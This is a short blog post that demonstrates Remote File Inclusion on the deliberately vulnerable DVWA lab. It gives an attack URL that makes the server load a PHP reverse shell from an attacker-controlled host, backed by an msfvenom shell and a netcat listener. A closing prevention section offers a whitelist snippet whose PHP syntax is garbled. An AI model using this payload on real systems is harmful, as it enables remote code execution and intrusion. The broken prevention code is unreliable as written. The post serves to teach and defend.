Friday, 5 February 2021

Remote File Inclusion to shell access

 
When remote file inclusion(RFI) is enabled on web-servers running PHP it allows the user to access a file on a remote server via the websites url. Similar to LFI(Local file inclusion) where we are limited to accessing files on the host machine only now we have a lot more power as we can force the server to execute any php file we wish.

For RFI to work these two settings must both be turned on in the PHP config file.

 
The example I am showing is RFI at its most basic level with security filters in place for the sake of proof of concept. Most RFI vulnerabilities in the wild will most likely require a certain level of filter evasion. At least one would hope so...
The web-server I am using is Damn Vulnerable Web Application installed on Windows IIS and can be downloaded from:
https://dvwa.co.uk/

When you come accroess webpages that use any kind of "page=" it is worth checking for LFI and RFI vulnerabilies. Anything that fetches some kind of page. language=, image=, page= etc etc.

Normal url
http://192.168.1.50/dvwa/vulnerabilities/fi/?page=puppies.php

URL Now pointing to malicious file on a remote server that we control:
http://192.168.1.50/dvwa/vulnerabilities/fi/?page=http://192.168.1.240:8080/shell.php
 
I am using a basic php shell generated via msfvenom as my reverse shell however there are hundreds of php shells out there, some with an insane amount of control built into them.

The Attack

Host the file on your own web server and start the listener. I am using npm http-server with a netcat listener.
 
 


Simply point the url you are attacking to your php file on your server:

http://192.168.1.50/dvwa/vulnerabilities/fi/?page=http://192.168.1.240:8080/shelly.php




Prevention

Ideally the obvious solution would be turn off allow_url_fopen in your php.ini file however if you MUST have url inclusion turned on then setting up filters in your source code something like this should prevent inclusion of malicious files.

<?php

// The page we wish to display
$file $_GET'page' ];

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    
// This isn't the page we want!
    
echo "ERROR: File not found!";
    exit;
}

?>







No comments:

Post a Comment